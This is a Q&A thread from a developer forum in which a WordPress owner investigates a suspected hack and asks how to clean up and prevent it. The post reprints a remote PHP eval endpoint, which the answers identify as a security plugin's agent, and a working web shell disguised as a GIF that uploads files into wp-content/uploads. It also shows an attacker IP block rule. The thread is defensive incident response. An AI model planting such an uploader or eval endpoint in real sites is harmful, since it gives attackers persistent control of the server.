# My wordpress has been hacked, but what did the hacker do and how can I prevent it/ fix damage done

Tags: wordpress, security

I saw highload on my server and looked at the apache server-status and saw a post to /2c1067813c6d8d0f28e13f0ce2c024fcbc17267b.php that was eating up 12% of my cpu.  I shutdown apache, moved the file, blocked the guy in my htaccess, and now I'm wondering what damage was done.  looks like the file was added 4 days ago

```
<?php
define('PAS_RES', 'twentycharacterhash');
define('PAS_REQ', 'anothertwentycharacterhash');
define('RSA_LEN', '256');
define('RSA_PUB', '65537');
define('RSA_MOD', '104794000726189251970535248702278838322004964525979459116994208185097637663513');

define('DEFLATE_RESPONSE_DATA', True);

header('Content-type: application/json');
error_reporting(0);
$version=2;$requestId='0';$jsonRPCVer='2.0';

if(!function_exists('property_exists'))
{ 
    function property_exists($class, $property)
    { 
        if(is_object($class))$vars=get_object_vars($class); 
        else $vars=get_class_vars($class); 
        return array_key_exists($property, $vars); 
    } 
} 
function senzorErrorHandler($errno, $errstr, $errfile, $errline)
{
    switch ($errno)
    {
        case E_NOTICE:
        case E_USER_NOTICE:
        case E_WARNING:
        case E_USER_WARNING:
            return True;        
        case E_ERROR:
            $code = 0;
            break;
        case E_USER_ERROR:
            $code = 1;
            break;
        default:
            $code = 2;
    }       
    if(function_exists('json_encode'))
    {
        $message = "{$errstr} ({$errfile} Line: {$errline})";
        $response = json_encode(array('jsonrpc' => $GLOBALS['jsonRPCVer'],'id'=>$GLOBALS['requestId'],'error'=>array('code'=>$code,'message'=> $message)));
    }
    else
    {
        $message = "{$errstr}";
        $response = "{\"jsonrpc\":{$GLOBALS['jsonRPCVer']},\"id\":{$GLOBALS['requestId']},\"error\":{\"code\":{$code},\"message\":\"{$message}\"}}";
    }
    die($response);
}

set_error_handler("senzorErrorHandler");
if(!function_exists('json_encode'))
{   
    if (!file_exists("compat/json.php"))    
        trigger_error("#COMPAT-JSON#", E_USER_ERROR);    
    require_once("compat/json.php");
    function json_encode($data)
    {
        $json = new Services_JSON();
        return($json->encode($data));
    }
}
if(!function_exists('json_decode'))
{
    if(!file_exists("compat/json.php")) 
        trigger_error("#COMPAT-JSON#", E_USER_ERROR);   
    function json_decode($data)
    {
        $json = new Services_JSON();
        return($json->decode($data));
    }
}

if(function_exists('bcmod'))
    define('BCMOD', true);
else
    {
        if(!file_exists("compat/array_fill.php")||!file_exists("compat/bcpowmod.php")||!file_exists("compat/biginteger.php")) 
            trigger_error("#COMPAT-BI#", E_USER_ERROR);
        require_once("compat/array_fill.php");
        require_once("compat/bcpowmod.php");
        require_once("compat/biginteger.php");
    }

function rsa_encrypt($message, $public_key, $modulus, $keylength, $notSigning = true)
{
    $result = '';
    $chunkLength = intval($keylength / 8) - 11;
    for($i = 0; $i < strlen($message); $i=$i+$chunkLength)
    {
        $padded = add_PKCS1_padding(substr($message, $i, $chunkLength), $notSigning, intval($keylength/8));
        $number = binary_to_number($padded);
        $encrypted = pow_mod($number, $public_key, $modulus);
        $binary = number_to_binary($encrypted, intval($keylength/8));
        $result .= $binary;
    }
    return $result;
}
function rsa_decrypt($message, $private_key, $modulus, $keylength)
{
    $result = '';
    $chunkLength = intval($keylength/8);
    for($i = 0; $i < strlen($message); $i=$i+$chunkLength)
    {
        $number = binary_to_number(substr($message, $i, $chunkLength));
        $decrypted = pow_mod($number, $private_key, $modulus);
        $presult = number_to_binary($decrypted, $chunkLength);
        $pres = remove_PKCS1_padding($presult, $chunkLength);
        if ($pres === FALSE)
            return FALSE;
        $result .= $pres;
    }
    return $result;
}
function rsa_sign($message, $private_key, $modulus, $keylength)
{
    return rsa_encrypt($message, $private_key, $modulus, $keylength, false);
}
function rsa_verify($message, $signature, $public_key, $modulus, $keylength)
{
    $result = false;
    $result = ($message==rsa_decrypt($signature, $public_key, $modulus, $keylength));
    return $result;
}
function pow_mod($p, $q, $r)
{
    if(defined('BCMOD'))
    {
        $factors = array();
        $div = $q;
        $power_of_two = 0;
        while(bccomp($div, "0") == 1) //BCCOMP_LARGER
        {
            $rem = bcmod($div, 2);
            $div = bcdiv($div, 2);

            if($rem) array_push($factors, $power_of_two);
            $power_of_two++;
        }
        $partial_results = array();
        $part_res = $p;
        $idx = 0;
        foreach($factors as $factor)
        {
            while($idx < $factor)
            {
                $part_res = bcpow($part_res, "2");
                $part_res = bcmod($part_res, $r);
                $idx++;
            }
            array_push($partial_results, $part_res);
        }
        $result = "1";
        foreach($partial_results as $part_res)
        {
            $result = bcmul($result, $part_res);
            $result = bcmod($result, $r);
        }
        return $result;
    }
    //Math_BigInteger implementation 
    $p = new Math_BigInteger($p);
    $q = new Math_BigInteger($q);
    $r = new Math_BigInteger($r);
    $x = $p->modPow($q, $r);
    return $x->toString();
}

function add_PKCS1_padding($data, $isPublicKey, $blocksize)
{   
    $pad_length = $blocksize - 3 - strlen($data);
    if($isPublicKey)
    {
        $block_type = "\x02";   
        $padding = "";      
        for($i = 0; $i < $pad_length; $i++)
            $padding .= chr(mt_rand(1, 255));
    }
    else
    {
        $block_type = "\x01";
        $padding = str_repeat("\xFF", $pad_length);
    }   
    return "\x00" . $block_type . $padding . "\x00" . $data;
}
function remove_PKCS1_padding($data, $blocksize)
{
    #bad data length
    if(strlen($data) != $blocksize) return FALSE;
    if(($data[0]!="\0") || ( ($data[1] != "\x01") && ($data[1] != "\x02") )) return FALSE;
    #bad padding type
    $offset = strpos($data, "\0", 1);
    return substr($data, $offset + 1);
}
function binary_to_number($data)
{   
    if(defined('BCMOD'))
    {
        $base = "256";
        $radix = "1";
        $result = "0";
        for($i = strlen($data) - 1; $i >= 0; $i--)
        {
            $digit = ord($data{$i});
            $part_res = bcmul($digit, $radix);
            $result = bcadd($result, $part_res);
            $radix = bcmul($radix, $base);
        }
        return $result;
    }   
    //Math_BigInteger implementation
    $result = new Math_BigInteger();
    $p = new Math_BigInteger("0x100", 16);
    $m = new Math_BigInteger("0x01", 16);
    for($i=strlen($data)-1; $i>=0; $i--)
    {       
        if(defined('MATH_BIGINTEGER_MODE') && defined('MATH_BIGINTEGER_MODE_INTERNAL') && (MATH_BIGINTEGER_MODE == MATH_BIGINTEGER_MODE_INTERNAL))
        {
            $d = new Math_BigInteger();
            $d->value = array(ord($data[$i]));
        }
        else $d = new Math_BigInteger(ord($data[$i]));

        $d = $d->multiply($m);
        $m = $m->multiply($p);
        $result = $result->add($d);
    }
    return $result->toString();
}

function hex_to_binary($hex, $blocksize)
{
    $result = '';
    for($i = 0; $i < (strlen($hex) - 1); $i = $i + 2)
        $result = $result . pack('H2', substr($hex, $i, 2));    
    $result = pack('H'.sprintf('%d',strlen($hex)), $hex);
    return str_pad($result, $blocksize, "\x00", STR_PAD_LEFT);
}

function number_to_binary($number, $blocksize)
{
    if(defined('BCMOD'))
    {
        $base = "256";
        $num = $number;
        $result = "";
        while($num > 0)
        {
            $mod = bcmod($num, $base);
            $num = bcdiv($num, $base);      
            $result = chr($mod) . $result;
        }
        return str_pad($result, $blocksize, "\x00", STR_PAD_LEFT);
    }   
    //Math_BigInteger implementation
    $result = "";
    $num = new Math_BigInteger($number);
    $zero = new Math_BigInteger();
    $divider = new Math_BigInteger("0x100",16); 
    while($num->compare($zero) > 0)
    {
        list($num, $remainder) = $num->divide($divider);
        $add = $remainder->toBytes();
        if($add == '') $add = "\0";
        $result = $add . $result;
    }   
    return str_pad($result, $blocksize, "\x00", STR_PAD_LEFT);
}
function rsa_sign_b64($message, $private_key, $modulus, $keylength)
{
    return base64_encode(rsa_sign($message, $private_key, $modulus, $keylength));
}
function rsa_verify_b64($message, $signature, $public_key, $modulus, $keylength)
{
    return rsa_verify($message, base64_decode($signature), $public_key, $modulus, $keylength);
}
function rsa_encrypt_b64($message, $public_key, $modulus, $keylength)
{
    return base64_encode(rsa_encrypt($message, $public_key, $modulus, $keylength));
}
function rsa_decrypt_b64($message, $private_key, $modulus, $keylength)
{
    return rsa_decrypt(base64_decode($message), $private_key, $modulus, $keylength);
}

function get_rnd_iv($iv_len)
{
    $iv = '';
    while ($iv_len-- > 0) $iv .= chr(mt_rand(1, 255));
    return $iv;
}
function md5_encrypt($plain_text, $password, $iv_len = 16)
{
    $plain_text .= "\x13";
    $n = strlen($plain_text);
    if ($n % 16) $plain_text .= str_repeat("\0", 16 - ($n % 16));
    $i = 0;
    $enc_text = get_rnd_iv($iv_len);
    $iv = substr($password ^ $enc_text, 0, 512);
    while ($i < $n) 
    {
        $block = substr($plain_text, $i, 16) ^ pack('H*', md5($iv));
        $enc_text .= $block;
        $iv = substr($block . $iv, 0, 512) ^ $password;
        $i += 16;
    }
    return base64_encode($enc_text);
}

function md5_decrypt($enc_text, $password, $iv_len = 16)
{
    $enc_text = base64_decode($enc_text);
    $n = strlen($enc_text);
    $i = $iv_len;
    $plain_text = '';
    $iv = substr($password ^ substr($enc_text, 0, $iv_len), 0, 512);
    while ($i < $n) 
    {
        $block = substr($enc_text, $i, 16);
        $plain_text .= $block ^ pack('H*', md5($iv));
        $iv = substr($block . $iv, 0, 512) ^ $password;
        $i += 16;
    }
    return preg_replace('/\\x13\\x00*$/', '', $plain_text);
}

function handleRequest($request = '')
{   
    if((!is_string($request))||($request==''))trigger_error("#REQUEST-EMPTY#", E_USER_ERROR);       
    $request = json_decode($request);   
    if(!is_object($request))trigger_error("#REQUEST-JSON#", E_USER_ERROR);   
    if( (!property_exists($request, 'jsonrpc')) || 
        (!property_exists($request, 'id')) || 
        (!property_exists($request, 'method')) || 
        (!property_exists($request, 'params')))trigger_error("#REQUEST-JSRPC#", E_USER_ERROR);     
    $GLOBALS['requestId']=$request->id;
    if(floatval($request->jsonrpc) != 2.0) trigger_error("#REQUEST-VERSION#", E_USER_ERROR);    
    $GLOBALS['jsonRPCVer']=$request->jsonrpc;               
    if(!property_exists($request, 'sign'))trigger_error("#REQUEST-SIG#", E_USER_ERROR);         
    if(property_exists($request, 'enc'))$request->params = md5_decrypt($request->params, PAS_REQ);
    if(property_exists($request, 'def'))
    {
        if(!function_exists('gzuncompress')) trigger_error("#COMPAT-ZLIB#", E_USER_ERROR);      
        $request->params = gzuncompress($request->params);
    }   
    if(!rsa_verify_b64(sha1($request->params), $request->sign, RSA_PUB, RSA_MOD, RSA_LEN))trigger_error("#REQUEST-SIG#", E_USER_ERROR); 
    if($request->method != "execute")trigger_error("#REQUEST-METHOD#", E_USER_ERROR);   
    $result = NULL;
    $success = @eval('?>'.$request->params);
    if($success === FALSE) trigger_error("#REQUEST-PROCESSING#", E_USER_ERROR);                         
    $result = json_encode($result); 
    $response = array ('jsonrpc' => $GLOBALS['jsonRPCVer'], 'id' => $request->id);  
    if(function_exists('gzcompress') && DEFLATE_RESPONSE_DATA && (strlen($result) > 100))
    {
        $response['def'] = true;
        $result = gzcompress($result, 6);
    }           
    $result = md5_encrypt($result, PAS_RES);    
    $response['enc'] = true;
    $response['result'] = $result;
    return json_encode($response);        
}

if (($_SERVER['REQUEST_METHOD'] == 'POST')&&(!empty($_SERVER['CONTENT_TYPE']))&&(preg_match('/^application\/json/i', $_SERVER['CONTENT_TYPE'])))
    echo handleRequest(file_get_contents('php://input'));
```

I created a file in the server root

410.php

```
<?php header('HTTP/1.0 410 Gone'); ?>
```

And in my .htaccess apache file I added

```
RewriteEngine On
RewriteBase /


RewriteCond %{REMOTE_ADDR} ^188.138.56.125 [OR]
RewriteCond %{REMOTE_ADDR} ^188.138.56.125 
RewriteRule ^.*$ 410.php [L]
```

I also noticed in my wp-content/uploads folder a somehash.php file with the contents

```
GIF89a^A^@^A^@<80>^@^@<FF><FF><FF>^@^@^@!<F9>^D^A^@^@^@^@,^@^@^@^@^A^@^A^@^@^B^BD^A^@;^@<?php $f=preg_replace('/(.*wp-content).*/i','\1',di
rname(__FILE__)).DIRECTORY_SEPARATOR.'uploads'.DIRECTORY_SEPARATOR.$_FILES['F']['name'];move_uploaded_file($_FILES['F']['tmp_name'],$f);ech
o "14qhpo"; ?>^@;
```

and a directory in it with 777 permissions containing my wordpress files, which I also deleted.

I'm going to reinstall my wordpress with fresh data and plugins in a clean directory, but how can I prevent this again, or better monitor for it? And what did the hacker do and how can I prevent it/ fix damage done?

I see someone else got the same hack here http://pastebin.com/k5HUythK

**EDIT 11/23**

Strangely, I think the first code I pasted might be a plugin I just installed websitedefender.com because now it's sending me emails that the 'agent is not responsive', http://wordpress.org/extend/plugins/wp-security-scan/, http://wordpress.org/extend/plugins/websitedefender-wordpress-security/

I would have thought they would annotate that file if it was legit

Comment: Saw some useful config here http://stackoverflow.com/q/6799496/879854

Comment: Is this good practice to share its IP? Another computer could get this IP in a few hours or it could be a zombie computer manipulated from a different location and this IP will get clean again in a few days/months.

Comment: @Felipe I don't know, but it's the ip hitting me now

Comment: i just came this question accidently and saw that still wrong answer is accepted ... just to inform this is not a "timthumb.php vulnerability"

Answer (score 4, accepted):

There is nothing to worry about (at least for this issue), because that file and code is a standard websitedefender.com sitecheck file. I guess you uploaded that to your site and forgotten?

Comment: yes, it appears that plugin just puts that file there and uses bandwidth / cpu / memory without telling you it's going to basically upload your site to its servers (or annotating their js that this is legit).  Confirmed by their tweeps http://twitter.com/#!/WebsiteDefender/status/139633151956889601

Answer (score 3):

Its probably the timthumb.php vulnerability.  If the timthumb.php file if its anywhere on the system make sure it is deleted.   You may have been hacked by multiple people so its best to backup the database and reinstall from scratch with the most up to date versions.

To detect vulnerabilities in your application I recommend testing your site with a vulnerability scanning service like [Sitewatch](https://sitewat.ch/en/About) or a program like [Skipfish](http://code.google.com/p/skipfish/).

Comment: It looks like skipfish might be an OSS alternative to websitedefender that I can run locally.

Comment: @BF4 yeah but its tricky to use and it can crash your system.  Sitewatch is easy to use,  it works behinds the scenes and they have a free service.

Answer (score 0):

something similar happened to me.  the weakness definitely seems to be plugins, akismet in particular but also some of the seo plugins.   these can allow injection attacks or worse.

Answer (score -1):

Your best bet will be to wipe your server and rebuild from your last known good backups.  Nothing else will be truly trustworthy.

Comment: Interesting that I got some random down vote, even though my answer is basically the same as the accepted one.